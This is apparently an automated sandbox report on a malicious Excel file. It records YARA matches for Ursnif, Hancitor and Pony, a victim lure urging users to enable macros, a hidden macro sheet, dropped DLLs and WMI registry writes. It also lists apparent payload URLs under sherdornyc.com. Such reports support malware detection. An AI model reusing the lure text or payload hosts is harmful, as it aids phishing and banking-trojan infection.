          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://powerlift.acompli.net
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://retailer.osi.office.net/appstate/query
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
          Source: svchost.exe, 00000006.00000003.448453203.0000000005A12000.00000004.00000001.sdmpString found in binary or memory: https://search.aol.com/favicon.icohttps://search.aol.com/aol/search?q=
          Source: svchost.exe, 00000006.00000003.448342974.0000000005A33000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: svchost.exe, 00000006.00000003.448342974.0000000005A33000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://settings.outlook.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://shell.suite.office.com:1443
          Source: svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmpString found in binary or memory: https://sherdornyc.com/wp-content/themes/futurio/1
          Source: svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmpString found in binary or memory: https://sherdornyc.com/wp-content/themes/futurio/2
          Source: svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmpString found in binary or memory: https://sherdornyc.com/wp-content/themes/futurio/3
          Source: svchost.exe, 00000006.00000002.707778201.0000000002800000.00000004.00000001.sdmpString found in binary or memory: https://sherdornyc.com/wp-content/themes/futurio/3w
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://skyapi.live.net/Activity/
          Source: svchost.exe, 00000006.00000003.448453203.0000000005A12000.00000004.00000001.sdmpString found in binary or memory: https://sp.ask.com/sh/i/a16/favicon/favicon.icohttps://www.ask.com/web?q=
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://store.office.cn/addinstemplate
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://store.office.com/addinstemplate
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://store.office.de/addinstemplate
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://store.officeppe.com/addinstemplate
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://tasks.office.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://templatelogging.office.com/client/log
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://web.microsoftstream.com/video/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://wus2-000.contentsync.
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://wus2-000.pagecontentsync.
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
          Source: svchost.exe, 00000006.00000003.448342974.0000000005A33000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://www.odwebp.svc.ms
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 0000000D.00000003.549497164.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549218494.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549333620.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549457976.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549162557.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549367546.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549299177.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549421669.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: BN6D10.tmp PID: 1940, type: MEMORY
          Source: BN6D10.tmp, 0000000D.00000002.705427682.0000000000F5A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 0000000D.00000003.549497164.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549218494.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549333620.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549457976.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549162557.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549367546.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549299177.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.549421669.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: BN6D10.tmp PID: 1940, type: MEMORY
          Yara detected PonyShow sources
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5128, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000D.00000003.549497164.0000000003868000.00000004.00000040.sdmp, type: MEMORYMatched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.711227479.0000000003868000.00000004.00000040.sdmp, type: MEMORYMatched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hancitor Payload Author: kevoreilly
          Source: 0000000D.00000003.549218494.0000000003868000.00000004.00000040.sdmp, type: MEMORYMatched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000003.549333620.0000000003868000.00000004.00000040.sdmp, type: MEMORYMatched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
          Source: 0000000D.00000003.549457976.0000000003868000.00000004.00000040.sdmp, type: MEMORYMatched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000003.549162557.0000000003868000.00000004.00000040.sdmp, type: MEMORYMatched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000003.549367546.0000000003868000.00000004.00000040.sdmp, type: MEMORYMatched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.705232412.0000000000EF1000.00000020.00000001.sdmp, type: MEMORYMatched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.481925943.00000000046C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hancitor Payload Author: kevoreilly
          Source: 00000006.00000003.440869721.0000000005800000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
          Source: 0000000D.00000003.549299177.0000000003868000.00000004.00000040.sdmp, type: MEMORYMatched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000003.549421669.0000000003868000.00000004.00000040.sdmp, type: MEMORYMatched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000003.458028337.0000000005100000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
          Source: Process Memory Space: BN6D10.tmp PID: 1940, type: MEMORYMatched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: svchost.exe PID: 5128, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
          Source: 6.2.svchost.exe.2440000.0.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
          Source: 5.2.regsvr32.exe.46c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
          Source: 13.2.BN6D10.tmp.ef0000.1.unpack, type: UNPACKEDPEMatched rule: detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.svchost.exe.2440000.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
          Source: 6.2.svchost.exe.10000000.3.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
          Source: 6.2.svchost.exe.10000000.3.raw.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
          Source: 6.3.svchost.exe.5800000.0.raw.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
          Source: 6.3.svchost.exe.5100000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Screenshot number: 12Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
          Source: Screenshot number: 12Screenshot OCR: document is protected To open the document, follow these steps: This document is only available f
          Source: Screenshot number: 12Screenshot OCR: Enable content button from the yellow bar above J K L I M I N I O I P I Q I R I S I " O
          Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
          Source: Document image extraction number: 0Screenshot OCR: document is protected To open the document, follow these steps: This document is only available f
          Source: Document image extraction number: 0Screenshot OCR: Enable content button from the yellow bar above
          Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
          Source: Document image extraction number: 1Screenshot OCR: document is protected To open the document, follow these steps: This document is only available f
          Source: Document image extraction number: 1Screenshot OCR: Enable content button from the yellow bar above
          Found abnormal large hidden Excel 4.0 Macro sheetShow sources
          Source: tr_0.xlsInitial sample: Sheet size: 14850327
          Office process drops PE fileShow sources
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dllJump to dropped file
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Documents\dDdoiBj.ocxJump to dropped file
          Writes or reads registry keys via WMIShow sources
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Writes registry values via WMIShow sources
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpCode function: 13_2_00401900 GetProcAddress,NtCreateSection,memset,13_2_00401900
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpCode function: 13_2_00401AF0 NtMapViewOfSection,13_2_00401AF0
          Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\Windows\AppCompat\Programs\Amcache.hve.tmpJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_046B01D95_2_046B01D9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_1000301A6_2_1000301A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_1000D46A6_2_1000D46A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0BC0341E12_2_0BC0341E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 10001D2A appears 55 times
          Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 696
          Source: BN6D10.tmp.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: BN6D10.tmp.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
          Source: tr_0.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
          Source: 0000000D.00000003.549497164.0000000003868000.00000004.00000040.sdmp, type: MEMORYMatched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.711227479.0000000003868000.00000004.00000040.sdmp, type: MEMORYMatched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
          Source: 0000000D.00000003.549218494.0000000003868000.00000004.00000040.sdmp, type: MEMORYMatched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000003.549333620.0000000003868000.00000004.00000040.sdmp, type: MEMORYMatched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
          Source: 0000000D.00000003.549457976.0000000003868000.00000004.00000040.sdmp, type: MEMORYMatched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000003.549162557.0000000003868000.00000004.00000040.sdmp, type: MEMORYMatched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000003.549367546.0000000003868000.00000004.00000040.sdmp, type: MEMORYMatched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.705232412.0000000000EF1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.481925943.00000000046C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
          Source: 00000006.00000003.440869721.0000000005800000.00000004.00000001.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
          Source: 0000000D.00000003.549299177.0000000003868000.00000004.00000040.sdmp, type: MEMORYMatched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000003.549421669.0000000003868000.00000004.00000040.sdmp, type: MEMORYMatched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000003.458028337.0000000005100000.00000004.00000001.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
          Source: Process Memory Space: BN6D10.tmp PID: 1940, type: MEMORYMatched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: svchost.exe PID: 5128, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
          Source: 6.2.svchost.exe.2440000.0.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
          Source: 5.2.regsvr32.exe.46c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
          Source: 13.2.BN6D10.tmp.ef0000.1.unpack, type: UNPACKEDPEMatched rule: Ursnif hash3 = 1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510, hash2 = ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714, hash1 = 0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85, author = JPCERT/CC Incident Response Group, description = detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.svchost.exe.2440000.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
          Source: 6.2.svchost.exe.10000000.3.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
          Source: 6.2.svchost.exe.10000000.3.raw.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
          Source: 6.3.svchost.exe.5800000.0.raw.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
          Source: 6.3.svchost.exe.5100000.1.raw.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
          Source: classification engineClassification label: mal100.bank.troj.spyw.expl.evad.winXLS@19/52@10/5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_10002941 LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification,6_2_10002941
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0BC09B51 LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,12_2_0BC09B51
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_1000AF31 CreateToolhelp32Snapshot,Process32First,StrStrIA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,FindCloseChangeNotification,CreateMutexA,CreateProcessA,6_2_1000AF31
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_10007FE8 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,6_2_10007FE8
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4912
          Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\mtxLogMeInIgnition.IgnitionMutex
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_01
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{DC128E87-8D5A-4163-A531-30831ABEA591} - OProcSessId.datJump to behavior
          Source: tr_0.xlsOLE indicator, Workbook stream: true
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: tr_0.xlsVirustotal: Detection: 20%
          Source: tr_0.xlsReversingLabs: Detection: 16%
          Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' /automation -Embedding
